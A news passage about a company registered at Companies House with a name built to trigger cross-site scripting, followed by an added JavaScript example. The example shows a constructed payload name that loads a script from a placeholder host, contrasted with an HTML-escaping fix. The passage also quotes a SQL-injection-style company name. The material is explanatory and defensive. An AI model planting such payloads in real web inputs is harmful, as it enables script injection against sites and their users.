
The original name of the company was ““> LTD”.

By beginning the name with a quotation mark and chevron, any site which failed to properly HTML-encode the company name before placing it in a page would have seen the quotation mark close the attribute holding the name, treated the name as blank, and then loaded and executed a script from the site XSS Hunter, which helps developers find cross-site scripting errors. That script would have simply put up a harmless alert – but it serves as proof that a malicious attacker could instead have used the same weakness as a gateway to more damaging ends.

The director of the company, who asked not to be named, told the Guardian: “Government Digital Service - GDS - have a good reputation for security, and other companies with similarly playful names have been registered in the past, so I thought there probably wouldn’t be a problem. When I discovered there were some minor problems, I contacted Companies House and the National Cyber Security Centre immediately, and didn’t disclose the issue to anyone else.”

He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to inject script into a page served by another website so that it runs in the browsers of that site’s visitors.

Companies House has retroactively removed the original name from its data feeds, and all documentation referring to its original moniker now reads simply “Company name available on request”.

Similar names have been registered in the past, such as “; DROP TABLE “COMPANIES”;-- LTD”, a wry attempt to carry out an attack known as SQL injection, inspired by a famous XKCD webcomic, but this was the first such name to have prompted a response.
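To show concretely how a name beginning with a quotation mark and chevron breaks out of an HTML attribute, and how output encoding prevents it, here is an added example (not code from the article, Companies House or the company's director). The company name and the script host (`example.invalid`) below are constructed for illustration and are not the name that was actually registered.

```javascript
// Added example (not from the article): how a company name beginning with
// `">` escapes an HTML attribute, and how HTML-escaping prevents it.
// CONSTRUCTED_NAME is made up for illustration; the host is a placeholder,
// not the real registered name or the real XSS Hunter address.
const CONSTRUCTED_NAME = '"><script src="https://example.invalid/probe.js"> LTD';

// Vulnerable: the raw name is interpolated into an attribute value.
// The leading `"` closes the value attribute, the `>` closes the <input>
// tag, and everything after it is parsed as a new <script> element, so the
// browser sees an input with an empty value followed by a remote script.
function renderUnsafe(name) {
  return `<input type="text" name="company" value="${name}">`;
}

// Minimal HTML escaper for text nodes and double-quoted attribute values.
// `&` is handled first so already-escaped output is not double-encoded later.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened: every metacharacter is encoded, so the whole name stays inside
// the attribute value and no <script> tag ever reaches the HTML parser.
function renderSafe(name) {
  return `<input type="text" name="company" value="${escapeHtml(name)}">`;
}

// Crude detector used only to contrast the two renderers: does the markup
// contain a literal script start tag? A real test would parse the output
// with a DOM and inspect the resulting elements.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Usage: the unsafe renderer emits a script tag, the safe one does not.
console.log(containsScriptTag(renderUnsafe(CONSTRUCTED_NAME))); // true
console.log(containsScriptTag(renderSafe(CONSTRUCTED_NAME)));   // false
```

`escapeHtml` is correct only for HTML text and quoted attribute values. Unquoted attributes, URLs, inline event handlers and `<script>` bodies each need their own context-specific encoder, which is why templating engines that escape by default are preferable to hand-rolled string building.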
